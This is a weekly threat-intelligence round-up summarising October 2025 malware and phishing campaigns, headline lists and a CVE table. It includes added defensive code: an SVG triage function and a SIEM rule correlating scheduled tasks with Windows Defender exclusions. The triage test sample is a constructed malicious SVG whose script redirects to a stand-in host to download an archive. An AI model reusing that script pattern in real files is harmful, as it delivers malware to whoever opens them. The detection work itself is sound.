Weekly Cyber Round-up

Intelligence Report

October 2, 2025

Phishing campaign leveraging SVG files targets Ukraine with CountLoader, Amatera and PureMiner

Fortinet researchers observed an email phishing campaign impersonating the National Police of Ukraine and leveraging SVG files to deliver malware against targeted Ukrainian systems. Once opened, the SVG attachments initiate the download of a password-protected archive under the guise of an Adobe Reader interface, which contains a Compiled HTML Help file, triggering an infection chain via CountLoader to ultimately install Amatera Stealer and PureMiner. Amatera Stealer and PureMiner are executed via .NET Ahead-of-Time compilation with process hollowing or loaded directly into memory via PythonMemoryModule. When executed, Amatera creates a mutex with hardcoded values before connecting to a remote server and issuing GET requests to obtain a configuration file. The stealer gathers system information, Gecko-based application related files, Chromium-based application files, desktop wallets, and more. A more recent campaign only delivered Amatera and featured stronger obfuscation techniques during the delivery stage.  
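The report does not describe how the SVG attachments in this campaign trigger the download, but an SVG that initiates anything on open needs active content (script, event handlers, embedded HTML, or an external reference), and those are the features a mail gateway or analyst can triage for. The following is an added example, not Fortinet's tooling or a campaign artefact: a static SVG triage function with two constructed samples. Which features count as suspicious is an assumption of this example.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# Constructed samples for the example; neither is a real campaign file.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="steelblue"/>
</svg>"""

SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script type="text/javascript">
    window.location = "https://example.invalid/download/archive.zip";
  </script>
  <a xlink:href="javascript:void(0)"><text x="10" y="20">Open document</text></a>
  <foreignObject width="100" height="100">
    <div xmlns="http://www.w3.org/1999/xhtml">x</div>
  </foreignObject>
</svg>"""

URL_RE = re.compile(r"https?://", re.I)


def _local(name: str) -> str:
    """Strip an XML namespace prefix: '{http://...}script' -> 'script'."""
    return name.rsplit("}", 1)[-1]


def triage_svg(svg_text: str) -> List[str]:
    """Return a list of static findings that make an SVG worth detonating or blocking.

    Heuristics (assumed for this example): script elements, on* event handler
    attributes, javascript: URIs, foreignObject (embedded HTML), and external
    http(s) references. An empty list means none of these features were seen;
    it is not a clean bill of health.
    """
    findings: List[str] = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Malformed XML is itself a reason to route the file for analysis.
        return [f"parse-error: {exc}"]

    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "script":
            findings.append("script element")
        if tag == "foreignObject":
            findings.append("foreignObject element (embedded HTML)")
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()
            val = value.strip()
            if name.startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
            if name == "href" and val.lower().startswith("javascript:"):
                findings.append(f"javascript: URI in href on <{tag}>")
            if name == "href" and URL_RE.match(val):
                findings.append(f"external reference {val} on <{tag}>")
        if tag == "script" and elem.text and URL_RE.search(elem.text):
            findings.append("URL inside script body")
    return findings


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, triage_svg(sample))
```

Because the check is purely static, it is cheap enough to run on every SVG attachment at the gateway; anything with findings can be quarantined or detonated, and a policy that strips SVG attachments outright is the simpler option for organisations that never need them.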


Smishing campaign exploits cellular router APIs to target Europe

Since July 22nd, 2025, Sekoia researchers have observed the exploitation of a cellular router’s API to send smishing messages, with Belgium being the most likely target. The phishing URLs typosquat well-known Belgian government platforms, namely CSAM and eBox, with messages written in both Dutch and French. The campaign appears to specifically target Milesight industrial cellular routers, of which over 19,000 are exposed online and at least 572 are potentially vulnerable, nearly half of them located in Europe. Honeypot logs revealed that the attackers use an authentication cookie to access the router APIs, suggesting they hold valid credentials. The credentials may have been obtained through CVE-2023-43261, which affects several Milesight routers; however, misconfigurations may also have been used to access the SMS router API and send smishing messages. Most of the vulnerable routers run outdated firmware, with versions 32.2.x.x and 32.3.x.x the most observed, though two devices were identified running more recent versions, specifically 41.0.0.2 and 41.0.0.3. The campaign has been active since at least February 2022, with campaigns targeting France, Sweden, Italy, Singapore, Norway, Portugal, and Hungary also observed.

TradingView malvertising campaign migrates to Google Ads and YouTube

Bitdefender researchers observed a malicious campaign, which initially leveraged Facebook Ads to offer ‘free access’ to TradingView Premium and other trading or financial platforms, now leveraging YouTube and Google Ads for distribution. The threat actors hijacked the Google advertiser account of a Norwegian design agency and, separately, a YouTube account, using the Google Ads system to direct victims to the channel. The channel posts unlisted videos featuring a link that redirects victims to pages designed to download malware or harvest credentials. The malware distributed in the campaign resembles that seen in previous instances, with the new sample communicating via WebSocket on port 30000 and the ‘/config’ route. The initial downloader is custom-built to resist detection and analysis and uses techniques consistent with past infostealer campaigns. The malware uses PostHog for user tracking and establishes persistence by creating a Scheduled Task, which enables it to add Windows Defender exclusions and ultimately download and execute JSCEAL.
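The persistence step above (a Scheduled Task that then adds Windows Defender exclusions) leaves two separate host log events close together, which is a good correlation target for a SIEM rule. The following is an added example, not Bitdefender's detection content: it correlates Windows Security event 4698 (scheduled task created) with a Defender Operational event 5007 (antimalware platform configuration changed) that records a new exclusion on the same host within a short window. The event records are constructed for the example; their field names and message wording are assumptions that loosely follow the real events, not a copy of them.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed sample events (not from the campaign). Shapes loosely follow
# Security 4698 (task created) and Defender Operational 5007 (config changed).
SAMPLE_EVENTS: List[Dict] = [
    {"time": "2025-10-01T09:00:05", "host": "WS01", "id": 4698,
     "task": r"\Updater", "user": r"WS01\alice"},
    {"time": "2025-10-01T09:00:21", "host": "WS01", "id": 5007,
     "message": r"Old value: ; New value: HKLM\SOFTWARE\Microsoft\Windows Defender"
                r"\Exclusions\Paths\C:\Users\alice\AppData\Roaming\x = 0x0"},
    # Legitimate admin activity: task and exclusion hours apart -> no alert.
    {"time": "2025-10-01T11:30:00", "host": "WS02", "id": 4698,
     "task": r"\Backup", "user": r"WS02\bob"},
    {"time": "2025-10-01T15:00:00", "host": "WS02", "id": 5007,
     "message": r"Old value: ; New value: HKLM\SOFTWARE\Microsoft\Windows Defender"
                r"\Exclusions\Paths\D:\Backups = 0x0"},
    # A 5007 that is not an exclusion change -> ignored.
    {"time": "2025-10-01T12:00:00", "host": "WS03", "id": 5007,
     "message": r"Old value: 0x0; New value: HKLM\SOFTWARE\Microsoft\Windows Defender"
                r"\Real-Time Protection\DisableRealtimeMonitoring = 0x1"},
]

# Captures the exclusion kind (Paths, Extensions, Processes) and the value.
EXCLUSION_RE = re.compile(r"Exclusions\\(\w+)\\(.+?) = 0x", re.I)


def exclusion_added(event: Dict) -> Optional[Tuple[str, str]]:
    """Return (kind, value) if a 5007 event records a new Defender exclusion."""
    if event.get("id") != 5007:
        return None
    match = EXCLUSION_RE.search(event.get("message", ""))
    return (match.group(1), match.group(2)) if match else None


def correlate_task_then_exclusion(events: List[Dict],
                                  window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Alert when a scheduled task is created and, within `window`, a Defender
    exclusion is added on the same host. Returns one alert per matching pair."""
    alerts: List[Dict] = []
    task_events = [e for e in events if e.get("id") == 4698]
    for event in events:
        exclusion = exclusion_added(event)
        if exclusion is None:
            continue
        excl_time = datetime.fromisoformat(event["time"])
        for task in task_events:
            if task["host"] != event["host"]:
                continue
            task_time = datetime.fromisoformat(task["time"])
            if timedelta(0) <= excl_time - task_time <= window:
                alerts.append({
                    "host": event["host"],
                    "task": task["task"],
                    "user": task.get("user"),
                    "exclusion_kind": exclusion[0],
                    "exclusion": exclusion[1],
                    "task_time": task["time"],
                    "exclusion_time": event["time"],
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate_task_then_exclusion(SAMPLE_EVENTS):
        print(alert)
```

The ten-minute window is a tuning choice: malware performs both steps in seconds, while legitimate administrators rarely create a task and then exclude a user-profile path from scanning moments later. Exclusions under user-writable directories such as AppData are worth weighting higher than those under dedicated backup or application volumes.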

GuLoader campaign targets businesses in French-speaking countries with MassLogger

Symantec researchers observed a new GuLoader campaign in which threat actors are impersonating a well-known hospitality and luxury resort/events group in Morocco in an attempt to deploy the MassLogger stealer. The campaign sends fraudulent quotation request emails that contain a malicious BZ archive containing a VBS script. Upon execution, the script initiates the GuLoader infection chain, ultimately leading to the installation of MassLogger. The campaign primarily targets organizations across French-speaking countries, including France, Morocco, Tunisia, Belgium, and Madagascar, with additional activity observed against entities in broader Europe and beyond. The campaign targets multiple sectors, including finance and banking, insurance, automotive manufacturing and distribution, industrial equipment and engineering, and more. 

Phantom Taurus targets critical organizations using NET-STAR malware suite

Palo Alto Networks Unit 42 researchers detailed the recent activity of Phantom Taurus, a China-nexus advanced persistent threat actor that has targeted government and telecommunication organizations across Africa, the Middle East, and Asia for the past two and a half years. Phantom Taurus’ main focus includes ministries of foreign affairs, embassies, geopolitical events, and military operations, with espionage the primary objective. The group has recently shifted from email server compromise to the direct targeting of databases: it was observed leveraging Windows Management Instrumentation to execute a batch script on remote SQL servers that searches for documents related to countries such as Afghanistan and Pakistan. Phantom Taurus has also been observed using a new .NET malware suite, dubbed NET-STAR, against IIS web servers. The suite consists of three web-based backdoors: IIServerCore, which supports in-memory execution of command-line arguments, arbitrary commands, and payloads; AssemblyExecuter V1, which loads and executes .NET payloads in memory; and AssemblyExecuter V2, which adds Antimalware Scan Interface and Event Tracing for Windows bypass capabilities. The group has also been seen using common tools such as China Chopper, the Potato suite, and Impacket, as well as customized tools like the Specter malware.

Ransomware

Clop extortion emails claim theft of Oracle E-Business Suite data (Bleeping Computer – Oct 02 2025)
Akira Ransomware Group Claims Eleven New Victims (Daily Dark Web – Sep 30 2025)
New LockBit 5.0 Targets Windows, Linux, ESXi (Trend Micro Simply Security – Sep 25 2025)
Ransom Tales: Volume IV – Emulating Rhysida, Charon and Dire Wolf Ransomware (Security Boulevard – Sep 25 2025)
Where Are my Keys?! Ransomware Group Steals AWS Keys to Advance (Varonis Blog – Sep 25 2025)

Financial Services

New Android Banking Trojan “Klopatra” Uses Hidden VNC to Control Infected Smartphones (The Hacker News – Oct 01 2025)
Datzbro: RAT Hiding Behind Senior Travel Scams (Threat Fabric Blog – Sep 30 2025)
UK convicts “Bitcoin Queen” in world’s largest cryptocurrency seizure (Bleeping Computer – Sep 29 2025)
273,000 Indian Bank Transfer Records Exposed in National Automated Clearing House Cloud Server Leak (TechNadu – Sep 26 2025)
Ukrainian cyber experts cripple Russia’s fast payment banking system – source (Ukrayinska Pravda – Sep 25 2025)

Geopolitics

Ukraine Warns of CABINETRAT Backdoor + XLL Add-ins Spread via Signal ZIPs (The Hacker News – Oct 01 2025)
Moldova Election Hit by Cyberattacks Amid Political Tensions, Blocking 4,000 Vote-Related Websites (TechNadu – Sep 29 2025)
Anonymous TikTok accounts backing radical parties before Czech vote, study finds (Reuters – Sep 28 2025)
Two Dutch teens arrested in rare Russian espionage case (NL Times – Sep 26 2025)
Iran Claims Major Leak of Israeli Nuclear Program Data (Daily Dark Web – Sep 25 2025)

High Priority Vulnerabilities

Name             Software                   Base Score   Temp Score
CVE-2025-20333   Firepower Threat Defense   9.9          8.4
Related: RayInitiator and LINE VIPER used in zero-day attacks on Cisco ASA firewalls

CVE-2025-41244   Telco Cloud Infrastructure 7.8          7.5
Related: You name it, VMware elevates it (CVE-2025-41244)

CVE-2025-56383   Notepad++                  8.4          6.8
Related: PoC exploit published for zero-day DLL hijacking flaw in Notepad++

CVE-2025-10035   GoAnywhere MFT             10.0         9.8
Related: Critical Fortra GoAnywhere flaw exploited in the wild prior to disclosure

CVE-2021-21311   Adminer                    7.3          7.0
Related: High-severity Adminer SSRF flaw among actively exploited vulnerabilities
